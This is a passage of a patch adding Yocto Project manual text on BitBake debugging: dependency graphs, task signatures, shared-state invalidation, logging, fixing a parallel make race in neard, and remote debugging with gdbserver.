+- ``oe-pkgdata-util list-pkg-files package ...``: Lists the
+ files and directories contained in the given packages.
+
+ .. note::
+
+ A different way to view the contents of a package is to look at
+ the
+ ``${``\ :term:`WORKDIR`\ ``}/packages-split``
+ directory of the recipe that generates the package. This directory
+ is created by the
+ :ref:`ref-tasks-package` task
+ and has one subdirectory for each package the recipe generates,
+ which contains the files stored in that package.
+
+ If you want to inspect the ``${WORKDIR}/packages-split``
+ directory, make sure that
+ :ref:`rm_work <ref-classes-rm-work>` is not
+ enabled when you build the recipe.
+
+- ``oe-pkgdata-util find-path path ...``: Lists the names of
+ the packages that contain the given paths. For example, the following
+ tells us that ``/usr/share/man/man1/make.1`` is contained in the
+ ``make-doc`` package:
+ ::
+
+ $ oe-pkgdata-util find-path /usr/share/man/man1/make.1
+ make-doc: /usr/share/man/man1/make.1
+
+- ``oe-pkgdata-util lookup-recipe package ...``: Lists the name
+ of the recipes that produce the given packages.
+
+For more information on the ``oe-pkgdata-util`` command, use the help
+facility:
+::
+
+ $ oe-pkgdata-util --help
+ $ oe-pkgdata-util subcommand --help
+
+.. _dev-viewing-dependencies-between-recipes-and-tasks:
+
+Viewing Dependencies Between Recipes and Tasks
+----------------------------------------------
+
+Sometimes it can be hard to see why BitBake wants to build other recipes
+before the one you have specified. Dependency information can help you
+understand why a recipe is built.
+
+To generate dependency information for a recipe, run the following
+command:
+::
+
+ $ bitbake -g recipename
+
+This command writes the following files in the current directory:
+
+- ``pn-buildlist``: A list of recipes/targets involved in building
+ `recipename`. "Involved" here means that at least one task from the
+ recipe needs to run when building `recipename` from scratch. Targets
+ that are in
+ :term:`ASSUME_PROVIDED`
+ are not listed.
+
+- ``task-depends.dot``: A graph showing dependencies between tasks.
+
+The graphs are in
+`DOT <https://en.wikipedia.org/wiki/DOT_%28graph_description_language%29>`__
+format and can be converted to images (e.g. using the ``dot`` tool from
+`Graphviz <https://www.graphviz.org/>`__).
+
+.. note::
+
+ - DOT files use a plain text format. The graphs generated using the
+ ``bitbake -g`` command are often so large as to be difficult to
+ read without special pruning (e.g. with Bitbake's ``-I`` option)
+ and processing. Despite the form and size of the graphs, the
+ corresponding ``.dot`` files can still be possible to read and
+ provide useful information.
+
+ As an example, the ``task-depends.dot`` file contains lines such
+ as the following:
+ ::
+
+ "libxslt.do_configure" -> "libxml2.do_populate_sysroot"
+
+ The above example line reveals that the
+ :ref:`ref-tasks-configure`
+ task in ``libxslt`` depends on the
+ :ref:`ref-tasks-populate_sysroot`
+ task in ``libxml2``, which is a normal
+ :term:`DEPENDS` dependency
+ between the two recipes.
+
+ - For an example of how ``.dot`` files can be processed, see the
+ ``scripts/contrib/graph-tool`` Python script, which finds and
+ displays paths between graph nodes.
+
+You can use a different method to view dependency information by using
+the following command:
+::
+
+ $ bitbake -g -u taskexp recipename
+
+This command
+displays a GUI window from which you can view build-time and runtime
+dependencies for the recipes involved in building recipename.
+
+.. _dev-viewing-task-variable-dependencies:
+
+Viewing Task Variable Dependencies
+----------------------------------
+
+As mentioned in the
+":ref:`bitbake:bitbake-user-manual/bitbake-user-manual-execution:checksums (signatures)`" section of the BitBake
+User Manual, BitBake tries to automatically determine what variables a
+task depends on so that it can rerun the task if any values of the
+variables change. This determination is usually reliable. However, if
+you do things like construct variable names at runtime, then you might
+have to manually declare dependencies on those variables using
+``vardeps`` as described in the
+":ref:`bitbake:bitbake-user-manual/bitbake-user-manual-metadata:variable flags`" section of the BitBake
+User Manual.
+
+If you are unsure whether a variable dependency is being picked up
+automatically for a given task, you can list the variable dependencies
+BitBake has determined by doing the following:
+
+1. Build the recipe containing the task:
+::
+
+ $ bitbake recipename
+
+2. Inside the :term:`STAMPS_DIR`
+ directory, find the signature data (``sigdata``) file that
+ corresponds to the task. The ``sigdata`` files contain a pickled
+ Python database of all the metadata that went into creating the input
+ checksum for the task. As an example, for the
+ :ref:`ref-tasks-fetch` task of the
+ ``db`` recipe, the ``sigdata`` file might be found in the following
+ location:
+ ::
+
+ ${BUILDDIR}/tmp/stamps/i586-poky-linux/db/6.0.30-r1.do_fetch.sigdata.7c048c18222b16ff0bcee2000ef648b1
+
+ For tasks that are accelerated through the shared state
+ (:ref:`sstate <overview-manual/overview-manual-concepts:shared state cache>`) cache, an
+ additional ``siginfo`` file is written into
+ :term:`SSTATE_DIR` along with
+ the cached task output. The ``siginfo`` files contain exactly the
+ same information as ``sigdata`` files.
+
+3. Run ``bitbake-dumpsig`` on the ``sigdata`` or ``siginfo`` file. Here
+ is an example:
+ ::
+
+ $ bitbake-dumpsig ${BUILDDIR}/tmp/stamps/i586-poky-linux/db/6.0.30-r1.do_fetch.sigdata.7c048c18222b16ff0bcee2000ef648b1
+
+ In the output of the above command, you will find a line like the
+ following, which lists all the (inferred) variable dependencies for
+ the task. This list also includes indirect dependencies from
+ variables depending on other variables, recursively.
+ ::
+
+ Task dependencies: ['PV', 'SRCREV', 'SRC_URI', 'SRC_URI[md5sum]', 'SRC_URI[sha256sum]', 'base_do_fetch']
+
+ .. note::
+
+ Functions (e.g. ``base_do_fetch``) also count as variable dependencies.
+ These functions in turn depend on the variables they reference.
+
+ The output of ``bitbake-dumpsig`` also includes the value each
+ variable had, a list of dependencies for each variable, and
+ :term:`bitbake:BB_HASHBASE_WHITELIST`
+ information.
+
+There is also a ``bitbake-diffsigs`` command for comparing two
+``siginfo`` or ``sigdata`` files. This command can be helpful when
+trying to figure out what changed between two versions of a task. If you
+call ``bitbake-diffsigs`` with just one file, the command behaves like
+``bitbake-dumpsig``.
+
+You can also use BitBake to dump out the signature construction
+information without executing tasks by using either of the following
+BitBake command-line options:
+::
+
+ â€â€dump-signatures=SIGNATURE_HANDLER
+ -S SIGNATURE_HANDLER
+
+
+.. note::
+
+ Two common values for `SIGNATURE_HANDLER` are "none" and "printdiff", which
+ dump only the signature or compare the dumped signature with the cached one,
+ respectively.
+
+Using BitBake with either of these options causes BitBake to dump out
+``sigdata`` files in the ``stamps`` directory for every task it would
+have executed instead of building the specified target package.
+
+.. _dev-viewing-metadata-used-to-create-the-input-signature-of-a-shared-state-task:
+
+Viewing Metadata Used to Create the Input Signature of a Shared State Task
+--------------------------------------------------------------------------
+
+Seeing what metadata went into creating the input signature of a shared
+state (sstate) task can be a useful debugging aid. This information is
+available in signature information (``siginfo``) files in
+:term:`SSTATE_DIR`. For
+information on how to view and interpret information in ``siginfo``
+files, see the "`Viewing Task Variable
+Dependencies <#dev-viewing-task-variable-dependencies>`__" section.
+
+For conceptual information on shared state, see the
+":ref:`overview-manual/overview-manual-concepts:shared state`"
+section in the Yocto Project Overview and Concepts Manual.
+
+.. _dev-invalidating-shared-state-to-force-a-task-to-run:
+
+Invalidating Shared State to Force a Task to Run
+------------------------------------------------
+
+The OpenEmbedded build system uses
+:ref:`checksums <overview-checksums>` and
+:ref:`overview-manual/overview-manual-concepts:shared state` cache to avoid unnecessarily
+rebuilding tasks. Collectively, this scheme is known as "shared state
+code".
+
+As with all schemes, this one has some drawbacks. It is possible that
+you could make implicit changes to your code that the checksum
+calculations do not take into account. These implicit changes affect a
+task's output but do not trigger the shared state code into rebuilding a
+recipe. Consider an example during which a tool changes its output.
+Assume that the output of ``rpmdeps`` changes. The result of the change
+should be that all the ``package`` and ``package_write_rpm`` shared
+state cache items become invalid. However, because the change to the
+output is external to the code and therefore implicit, the associated
+shared state cache items do not become invalidated. In this case, the
+build process uses the cached items rather than running the task again.
+Obviously, these types of implicit changes can cause problems.
+
+To avoid these problems during the build, you need to understand the
+effects of any changes you make. Realize that changes you make directly
+to a function are automatically factored into the checksum calculation.
+Thus, these explicit changes invalidate the associated area of shared
+state cache. However, you need to be aware of any implicit changes that
+are not obvious changes to the code and could affect the output of a
+given task.
+
+When you identify an implicit change, you can easily take steps to
+invalidate the cache and force the tasks to run. The steps you can take
+are as simple as changing a function's comments in the source code. For
+example, to invalidate package shared state files, change the comment
+statements of
+:ref:`ref-tasks-package` or the
+comments of one of the functions it calls. Even though the change is
+purely cosmetic, it causes the checksum to be recalculated and forces
+the build system to run the task again.
+
+.. note::
+
+ For an example of a commit that makes a cosmetic change to invalidate
+ shared state, see this
+ :yocto_git:`commit </cgit.cgi/poky/commit/meta/classes/package.bbclass?id=737f8bbb4f27b4837047cb9b4fbfe01dfde36d54>`.
+
+.. _dev-debugging-taskrunning:
+
+Running Specific Tasks
+----------------------
+
+Any given recipe consists of a set of tasks. The standard BitBake
+behavior in most cases is: ``do_fetch``, ``do_unpack``, ``do_patch``,
+``do_configure``, ``do_compile``, ``do_install``, ``do_package``,
+``do_package_write_*``, and ``do_build``. The default task is
+``do_build`` and any tasks on which it depends build first. Some tasks,
+such as ``do_devshell``, are not part of the default build chain. If you
+wish to run a task that is not part of the default build chain, you can
+use the ``-c`` option in BitBake. Here is an example:
+::
+
+ $ bitbake matchbox-desktop -c devshell
+
+The ``-c`` option respects task dependencies, which means that all other
+tasks (including tasks from other recipes) that the specified task
+depends on will be run before the task. Even when you manually specify a
+task to run with ``-c``, BitBake will only run the task if it considers
+it "out of date". See the
+":ref:`overview-manual/overview-manual-concepts:stamp files and the rerunning of tasks`"
+section in the Yocto Project Overview and Concepts Manual for how
+BitBake determines whether a task is "out of date".
+
+If you want to force an up-to-date task to be rerun (e.g. because you
+made manual modifications to the recipe's
+:term:`WORKDIR` that you want to try
+out), then you can use the ``-f`` option.
+
+.. note::
+
+ The reason ``-f`` is never required when running the
+ :ref:`ref-tasks-devshell` task is because the
+ [\ :ref:`nostamp <bitbake:bitbake-user-manual/bitbake-user-manual-metadata:variable flags>`\ ]
+ variable flag is already set for the task.
+
+The following example shows one way you can use the ``-f`` option:
+::
+
+ $ bitbake matchbox-desktop
+ .
+ .
+ make some changes to the source code in the work directory
+ .
+ .
+ $ bitbake matchbox-desktop -c compile -f
+ $ bitbake matchbox-desktop
+
+This sequence first builds and then recompiles ``matchbox-desktop``. The
+last command reruns all tasks (basically the packaging tasks) after the
+compile. BitBake recognizes that the ``do_compile`` task was rerun and
+therefore understands that the other tasks also need to be run again.
+
+Another, shorter way to rerun a task and all
+:ref:`ref-manual/ref-tasks:normal recipe build tasks`
+that depend on it is to use the ``-C`` option.
+
+.. note::
+
+ This option is upper-cased and is separate from the ``-c``
+ option, which is lower-cased.
+
+Using this option invalidates the given task and then runs the
+:ref:`ref-tasks-build` task, which is
+the default task if no task is given, and the tasks on which it depends.
+You could replace the final two commands in the previous example with
+the following single command:
+::
+
+ $ bitbake matchbox-desktop -C compile
+
+Internally, the ``-f`` and ``-C`` options work by tainting (modifying)
+the input checksum of the specified task. This tainting indirectly
+causes the task and its dependent tasks to be rerun through the normal
+task dependency mechanisms.
+
+.. note::
+
+ BitBake explicitly keeps track of which tasks have been tainted in
+ this fashion, and will print warnings such as the following for
+ builds involving such tasks:
+
+ .. code-block:: none
+
+ WARNING: /home/ulf/poky/meta/recipes-sato/matchbox-desktop/matchbox-desktop_2.1.bb.do_compile is tainted from a forced run
+
+
+ The purpose of the warning is to let you know that the work directory
+ and build output might not be in the clean state they would be in for
+ a "normal" build, depending on what actions you took. To get rid of
+ such warnings, you can remove the work directory and rebuild the
+ recipe, as follows:
+ ::
+
+ $ bitbake matchbox-desktop -c clean
+ $ bitbake matchbox-desktop
+
+
+You can view a list of tasks in a given package by running the
+``do_listtasks`` task as follows:
+::
+
+ $ bitbake matchbox-desktop -c listtasks
+
+The results appear as output to the console and are also in
+the file ``${WORKDIR}/temp/log.do_listtasks``.
+
+.. _dev-debugging-bitbake:
+
+General BitBake Problems
+------------------------
+
+You can see debug output from BitBake by using the ``-D`` option. The
+debug output gives more information about what BitBake is doing and the
+reason behind it. Each ``-D`` option you use increases the logging
+level. The most common usage is ``-DDD``.
+
+The output from ``bitbake -DDD -v targetname`` can reveal why BitBake
+chose a certain version of a package or why BitBake picked a certain
+provider. This command could also help you in a situation where you
+think BitBake did something unexpected.
+
+.. _dev-debugging-buildfile:
+
+Building with No Dependencies
+-----------------------------
+
+To build a specific recipe (``.bb`` file), you can use the following
+command form:
+::
+
+ $ bitbake -b somepath/somerecipe.bb
+
+This command form does
+not check for dependencies. Consequently, you should use it only when
+you know existing dependencies have been met.
+
+.. note::
+
+ You can also specify fragments of the filename. In this case, BitBake
+ checks for a unique match.
+
+Recipe Logging Mechanisms
+-------------------------
+
+The Yocto Project provides several logging functions for producing
+debugging output and reporting errors and warnings. For Python
+functions, the following logging functions exist. All of these functions
+log to ``${T}/log.do_``\ `task`, and can also log to standard output
+(stdout) with the right settings:
+
+- ``bb.plain(msg)``: Writes msg as is to the log while also
+ logging to stdout.
+
+- ``bb.note(msg)``: Writes "NOTE: msg" to the log. Also logs to
+ stdout if BitBake is called with "-v".
+
+- ``bb.debug(level, msg)``: Writes "DEBUG: msg" to the
+ log. Also logs to stdout if the log level is greater than or equal to
+ level. See the ":ref:`-D <bitbake:bitbake-user-manual/bitbake-user-manual-intro:usage and syntax>`" option
+ in the BitBake User Manual for more information.
+
+- ``bb.warn(msg)``: Writes "WARNING: msg" to the log while also
+ logging to stdout.
+
+- ``bb.error(msg)``: Writes "ERROR: msg" to the log while also
+ logging to standard out (stdout).
+
+ .. note::
+
+ Calling this function does not cause the task to fail.
+
+- ``bb.fatal(``\ msg\ ``)``: This logging function is similar to
+ ``bb.error(``\ msg\ ``)`` but also causes the calling task to fail.
+
+ .. note::
+
+ ``bb.fatal()`` raises an exception, which means you do not need to put a
+ "return" statement after the function.
+
+The same logging functions are also available in shell functions, under
+the names ``bbplain``, ``bbnote``, ``bbdebug``, ``bbwarn``, ``bberror``,
+and ``bbfatal``. The
+:ref:`logging <ref-classes-logging>` class
+implements these functions. See that class in the ``meta/classes``
+folder of the :term:`Source Directory` for information.
+
+Logging With Python
+~~~~~~~~~~~~~~~~~~~
+
+When creating recipes using Python and inserting code that handles build
+logs, keep in mind the goal is to have informative logs while keeping
+the console as "silent" as possible. Also, if you want status messages
+in the log, use the "debug" loglevel.
+
+Following is an example written in Python. The code handles logging for
+a function that determines the number of tasks needed to be run. See the
+":ref:`ref-tasks-listtasks`"
+section for additional information:
+::
+
+ python do_listtasks() {
+ bb.debug(2, "Starting to figure out the task list")
+ if noteworthy_condition:
+ bb.note("There are 47 tasks to run")
+ bb.debug(2, "Got to point xyz")
+ if warning_trigger:
+ bb.warn("Detected warning_trigger, this might be a problem later.")
+ if recoverable_error:
+ bb.error("Hit recoverable_error, you really need to fix this!")
+ if fatal_error:
+ bb.fatal("fatal_error detected, unable to print the task list")
+ bb.plain("The tasks present are abc")
+ bb.debug(2, "Finished figuring out the tasklist")
+ }
+
+Logging With Bash
+~~~~~~~~~~~~~~~~~
+
+When creating recipes using Bash and inserting code that handles build
+logs, you have the same goals - informative with minimal console output.
+The syntax you use for recipes written in Bash is similar to that of
+recipes written in Python described in the previous section.
+
+Following is an example written in Bash. The code logs the progress of
+the ``do_my_function`` function.
+::
+
+ do_my_function() {
+ bbdebug 2 "Running do_my_function"
+ if [ exceptional_condition ]; then
+ bbnote "Hit exceptional_condition"
+ fi
+ bbdebug 2 "Got to point xyz"
+ if [ warning_trigger ]; then
+ bbwarn "Detected warning_trigger, this might cause a problem later."
+ fi
+ if [ recoverable_error ]; then
+ bberror "Hit recoverable_error, correcting"
+ fi
+ if [ fatal_error ]; then
+ bbfatal "fatal_error detected"
+ fi
+ bbdebug 2 "Completed do_my_function"
+ }
+
+
+Debugging Parallel Make Races
+-----------------------------
+
+A parallel ``make`` race occurs when the build consists of several parts
+that are run simultaneously and a situation occurs when the output or
+result of one part is not ready for use with a different part of the
+build that depends on that output. Parallel make races are annoying and
+can sometimes be difficult to reproduce and fix. However, some simple
+tips and tricks exist that can help you debug and fix them. This section
+presents a real-world example of an error encountered on the Yocto
+Project autobuilder and the process used to fix it.
+
+.. note::
+
+ If you cannot properly fix a ``make`` race condition, you can work around it
+ by clearing either the :term:`PARALLEL_MAKE` or :term:`PARALLEL_MAKEINST`
+ variables.
+
+The Failure
+~~~~~~~~~~~
+
+For this example, assume that you are building an image that depends on
+the "neard" package. And, during the build, BitBake runs into problems
+and creates the following output.
+
+.. note::
+
+ This example log file has longer lines artificially broken to make
+ the listing easier to read.
+
+If you examine the output or the log file, you see the failure during
+``make``:
+
+.. code-block:: none
+
+ | DEBUG: SITE files ['endian-little', 'bit-32', 'ix86-common', 'common-linux', 'common-glibc', 'i586-linux', 'common']
+ | DEBUG: Executing shell function do_compile
+ | NOTE: make -j 16
+ | make --no-print-directory all-am
+ | /bin/mkdir -p include/near
+ | /bin/mkdir -p include/near
+ | /bin/mkdir -p include/near
+ | ln -s /home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/work/i586-poky-linux/neard/
+ 0.14-r0/neard-0.14/include/types.h include/near/types.h
+ | ln -s /home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/work/i586-poky-linux/neard/
+ 0.14-r0/neard-0.14/include/log.h include/near/log.h
+ | ln -s /home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/work/i586-poky-linux/neard/
+ 0.14-r0/neard-0.14/include/plugin.h include/near/plugin.h
+ | /bin/mkdir -p include/near
+ | /bin/mkdir -p include/near
+ | /bin/mkdir -p include/near
+ | ln -s /home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/work/i586-poky-linux/neard/
+ 0.14-r0/neard-0.14/include/tag.h include/near/tag.h
+ | /bin/mkdir -p include/near
+ | ln -s /home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/work/i586-poky-linux/neard/
+ 0.14-r0/neard-0.14/include/adapter.h include/near/adapter.h
+ | /bin/mkdir -p include/near
+ | ln -s /home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/work/i586-poky-linux/neard/
+ 0.14-r0/neard-0.14/include/ndef.h include/near/ndef.h
+ | ln -s /home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/work/i586-poky-linux/neard/
+ 0.14-r0/neard-0.14/include/tlv.h include/near/tlv.h
+ | /bin/mkdir -p include/near
+ | /bin/mkdir -p include/near
+ | ln -s /home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/work/i586-poky-linux/neard/
+ 0.14-r0/neard-0.14/include/setting.h include/near/setting.h
+ | /bin/mkdir -p include/near
+ | /bin/mkdir -p include/near
+ | /bin/mkdir -p include/near
+ | ln -s /home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/work/i586-poky-linux/neard/
+ 0.14-r0/neard-0.14/include/device.h include/near/device.h
+ | ln -s /home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/work/i586-poky-linux/neard/
+ 0.14-r0/neard-0.14/include/nfc_copy.h include/near/nfc_copy.h
+ | ln -s /home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/work/i586-poky-linux/neard/
+ 0.14-r0/neard-0.14/include/snep.h include/near/snep.h
+ | ln -s /home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/work/i586-poky-linux/neard/
+ 0.14-r0/neard-0.14/include/version.h include/near/version.h
+ | ln -s /home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/work/i586-poky-linux/neard/
+ 0.14-r0/neard-0.14/include/dbus.h include/near/dbus.h
+ | ./src/genbuiltin nfctype1 nfctype2 nfctype3 nfctype4 p2p > src/builtin.h
+ | i586-poky-linux-gcc -m32 -march=i586 --sysroot=/home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/
+ build/build/tmp/sysroots/qemux86 -DHAVE_CONFIG_H -I. -I./include -I./src -I./gdbus -I/home/pokybuild/
+ yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/sysroots/qemux86/usr/include/glib-2.0
+ -I/home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/sysroots/qemux86/usr/
+ lib/glib-2.0/include -I/home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/
+ tmp/sysroots/qemux86/usr/include/dbus-1.0 -I/home/pokybuild/yocto-autobuilder/yocto-slave/
+ nightly-x86/build/build/tmp/sysroots/qemux86/usr/lib/dbus-1.0/include -I/home/pokybuild/yocto-autobuilder/
+ yocto-slave/nightly-x86/build/build/tmp/sysroots/qemux86/usr/include/libnl3
+ -DNEAR_PLUGIN_BUILTIN -DPLUGINDIR=\""/usr/lib/near/plugins"\"
+ -DCONFIGDIR=\""/etc/neard\"" -O2 -pipe -g -feliminate-unused-debug-types -c
+ -o tools/snep-send.o tools/snep-send.c
+ | In file included from tools/snep-send.c:16:0:
+ | tools/../src/near.h:41:23: fatal error: near/dbus.h: No such file or directory
+ | #include <near/dbus.h>
+ | ^
+ | compilation terminated.
+ | make[1]: *** [tools/snep-send.o] Error 1
+ | make[1]: *** Waiting for unfinished jobs....
+ | make: *** [all] Error 2
+ | ERROR: oe_runmake failed
+
+Reproducing the Error
+~~~~~~~~~~~~~~~~~~~~~
+
+Because race conditions are intermittent, they do not manifest
+themselves every time you do the build. In fact, most times the build
+will complete without problems even though the potential race condition
+exists. Thus, once the error surfaces, you need a way to reproduce it.
+
+In this example, compiling the "neard" package is causing the problem.
+So the first thing to do is build "neard" locally. Before you start the
+build, set the
+:term:`PARALLEL_MAKE` variable
+in your ``local.conf`` file to a high number (e.g. "-j 20"). Using a
+high value for ``PARALLEL_MAKE`` increases the chances of the race
+condition showing up:
+::
+
+ $ bitbake neard
+
+Once the local build for "neard" completes, start a ``devshell`` build:
+::
+
+ $ bitbake neard -c devshell
+
+For information on how to use a
+``devshell``, see the "`Using a Development
+Shell <#platdev-appdev-devshell>`__" section.
+
+In the ``devshell``, do the following:
+::
+
+ $ make clean
+ $ make tools/snep-send.o
+
+The ``devshell`` commands cause the failure to clearly
+be visible. In this case, a missing dependency exists for the "neard"
+Makefile target. Here is some abbreviated, sample output with the
+missing dependency clearly visible at the end:
+::
+
+ i586-poky-linux-gcc -m32 -march=i586 --sysroot=/home/scott-lenovo/......
+ .
+ .
+ .
+ tools/snep-send.c
+ In file included from tools/snep-send.c:16:0:
+ tools/../src/near.h:41:23: fatal error: near/dbus.h: No such file or directory
+ #include <near/dbus.h>
+ ^
+ compilation terminated.
+ make: *** [tools/snep-send.o] Error 1
+ $
+
+
+Creating a Patch for the Fix
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Because there is a missing dependency for the Makefile target, you need
+to patch the ``Makefile.am`` file, which is generated from
+``Makefile.in``. You can use Quilt to create the patch:
+::
+
+ $ quilt new parallelmake.patch
+ Patch patches/parallelmake.patch is now on top
+ $ quilt add Makefile.am
+ File Makefile.am added to patch patches/parallelmake.patch
+
+For more information on using Quilt, see the
+"`Using Quilt in Your Workflow <#using-a-quilt-workflow>`__" section.
+
+At this point you need to make the edits to ``Makefile.am`` to add the
+missing dependency. For our example, you have to add the following line
+to the file:
+::
+
+ tools/snep-send.$(OBJEXT): include/near/dbus.h
+
+Once you have edited the file, use the ``refresh`` command to create the
+patch:
+::
+
+ $ quilt refresh
+ Refreshed patch patches/parallelmake.patch
+
+Once
+the patch file exists, you need to add it back to the originating recipe
+folder. Here is an example assuming a top-level
+:term:`Source Directory` named ``poky``:
+::
+
+ $ cp patches/parallelmake.patch poky/meta/recipes-connectivity/neard/neard
+
+The final thing you need to do to implement the fix in the build is to
+update the "neard" recipe (i.e. ``neard-0.14.bb``) so that the
+:term:`SRC_URI` statement includes
+the patch file. The recipe file is in the folder above the patch. Here
+is what the edited ``SRC_URI`` statement would look like:
+::
+
+ SRC_URI = "${KERNELORG_MIRROR}/linux/network/nfc/${BPN}-${PV}.tar.xz \
+ file://neard.in \
+ file://neard.service.in \
+ file://parallelmake.patch \
+ "
+
+With the patch complete and moved to the correct folder and the
+``SRC_URI`` statement updated, you can exit the ``devshell``:
+::
+
+ $ exit
+
+Testing the Build
+~~~~~~~~~~~~~~~~~
+
+With everything in place, you can get back to trying the build again
+locally:
+::
+
+ $ bitbake neard
+
+This build should succeed.
+
+Now you can open up a ``devshell`` again and repeat the clean and make
+operations as follows:
+::
+
+ $ bitbake neard -c devshell
+ $ make clean
+ $ make tools/snep-send.o
+
+The build should work without issue.
+
+As with all solved problems, if they originated upstream, you need to
+submit the fix for the recipe in OE-Core and upstream so that the
+problem is taken care of at its source. See the "`Submitting a Change to
+the Yocto Project <#how-to-submit-a-change>`__" section for more
+information.
+
+.. _platdev-gdb-remotedebug:
+
+Debugging With the GNU Project Debugger (GDB) Remotely
+------------------------------------------------------
+
+GDB allows you to examine running programs, which in turn helps you to
+understand and fix problems. It also allows you to perform post-mortem
+style analysis of program crashes. GDB is available as a package within
+the Yocto Project and is installed in SDK images by default. See the
+":ref:`ref-manual/ref-images:Images`" chapter in the Yocto
+Project Reference Manual for a description of these images. You can find
+information on GDB at https://sourceware.org/gdb/.
+
+.. note::
+
+ For best results, install debug (``-dbg``) packages for the applications you
+ are going to debug. Doing so makes extra debug symbols available that give
+ you more meaningful output.
+
+Sometimes, due to memory or disk space constraints, it is not possible
+to use GDB directly on the remote target to debug applications. These
+constraints arise because GDB needs to load the debugging information
+and the binaries of the process being debugged. Additionally, GDB needs
+to perform many computations to locate information such as function
+names, variable names and values, stack traces and so forth - even
+before starting the debugging process. These extra computations place
+more load on the target system and can alter the characteristics of the
+program being debugged.
+
+To help get past the previously mentioned constraints, you can use
+gdbserver, which runs on the remote target and does not load any
+debugging information from the debugged process. Instead, a GDB instance
+processes the debugging information that is run on a remote computer -
+the host GDB. The host GDB then sends control commands to gdbserver to
+make it stop or start the debugged program, as well as read or write
+memory regions of that debugged program. All the debugging information
+loaded and processed as well as all the heavy debugging is done by the
+host GDB. Offloading these processes gives the gdbserver running on the
+target a chance to remain small and fast.
+
+Because the host GDB is responsible for loading the debugging
+information and for doing the necessary processing to make actual
+debugging happen, you have to make sure the host can access the
+unstripped binaries complete with their debugging information and also
+be sure the target is compiled with no optimizations. The host GDB must
+also have local access to all the libraries used by the debugged
+program. Because gdbserver does not need any local debugging
+information, the binaries on the remote target can remain stripped.
+However, the binaries must also be compiled without optimization so they
+match the host's binaries.
+
+To remain consistent with GDB documentation and terminology, the binary
+being debugged on the remote target machine is referred to as the
+"inferior" binary. For documentation on GDB see the `GDB
+site <https://sourceware.org/gdb/documentation/>`__.
+
+The following steps show you how to debug using the GNU project
+debugger.
+
+1. *Configure your build system to construct the companion debug
+ filesystem:*
+
+ In your ``local.conf`` file, set the following:
+ ::
+
+ IMAGE_GEN_DEBUGFS = "1"
+ IMAGE_FSTYPES_DEBUGFS = "tar.bz2"
+
+ These options cause the
+ OpenEmbedded build system to generate a special companion filesystem
+ fragment, which contains the matching source and debug symbols to
+ your deployable filesystem. The build system does this by looking at
+ what is in the deployed filesystem, and pulling the corresponding
+ ``-dbg`` packages.
+
+ The companion debug filesystem is not a complete filesystem, but only
+ contains the debug fragments. This filesystem must be combined with
+ the full filesystem for debugging. Subsequent steps in this procedure
+ show how to combine the partial filesystem with the full filesystem.
+
+2. *Configure the system to include gdbserver in the target filesystem:*
+
+ Make the following addition in either your ``local.conf`` file or in
+ an image recipe:
+ ::
+
+ IMAGE_INSTALL_append = " gdbserver"
+
+ The change makes
+ sure the ``gdbserver`` package is included.
+
+3. *Build the environment:*
+
+ Use the following command to construct the image and the companion
+ Debug Filesystem:
+ ::
+
+ $ bitbake image
+
+ Build the cross GDB component and
+ make it available for debugging. Build the SDK that matches the
+ image. Building the SDK is best for a production build that can be
+ used later for debugging, especially during long term maintenance:
+ ::
+
+ $ bitbake -c populate_sdk image
+
+ Alternatively, you can build the minimal toolchain components that
+ match the target. Doing so creates a smaller than typical SDK and
+ only contains a minimal set of components with which to build simple
+ test applications, as well as run the debugger:
+ ::
+
+ $ bitbake meta-toolchain
+
+ A final method is to build Gdb itself within the build system:
+ ::
+
+ $ bitbake gdb-cross-<architecture>
+
+ Doing so produces a temporary copy of
+ ``cross-gdb`` you can use for debugging during development. While
+ this is the quickest approach, the two previous methods in this step
+ are better when considering long-term maintenance strategies.
+
+ .. note::
+
+ If you run ``bitbake gdb-cross``, the OpenEmbedded build system suggests
+ the actual image (e.g. ``gdb-cross-i586``). The suggestion is usually the
+ actual name you want to use.
+
+4. *Set up the* ``debugfs``\ *:*
+
+ Run the following commands to set up the ``debugfs``:
+ ::
+
+ $ mkdir debugfs
+ $ cd debugfs
+ $ tar xvfj build-dir/tmp-glibc/deploy/images/machine/image.rootfs.tar.bz2
+ $ tar xvfj build-dir/tmp-glibc/deploy/images/machine/image-dbg.rootfs.tar.bz2
+
+5. *Set up GDB:*
+
+ Install the SDK (if you built one) and then source the correct
+ environment file. Sourcing the environment file puts the SDK in your
+ ``PATH`` environment variable.
+
+ If you are using the build system, Gdb is located in
+ `build-dir`\ ``/tmp/sysroots/``\ `host`\ ``/usr/bin/``\ `architecture`\ ``/``\ `architecture`\ ``-gdb``
+
+6. *Boot the target:*
+
+ For information on how to run QEMU, see the `QEMU
+ Documentation <https://wiki.qemu.org/Documentation/GettingStartedDevelopers>`__.
+
+ .. note::
+
+ Be sure to verify that your host can access the target via TCP.
+
+7. *Debug a program:*
+
+ Debugging a program involves running gdbserver on the target and then
+ running Gdb on the host. The example in this step debugs ``gzip``:
+
+ .. code-block:: shell
+
+ root@qemux86:~# gdbserver localhost:1234 /bin/gzip —help
+
+ For
+ additional gdbserver options, see the `GDB Server
+ Documentation <https://www.gnu.org/software/gdb/documentation/>`__.
+
+ After running gdbserver on the target, you need to run Gdb on the
+ host and configure it and connect to the target. Use these commands:
+ ::
+
+ $ cd directory-holding-the-debugfs-directory
+ $ arch-gdb
+ (gdb) set sysroot debugfs
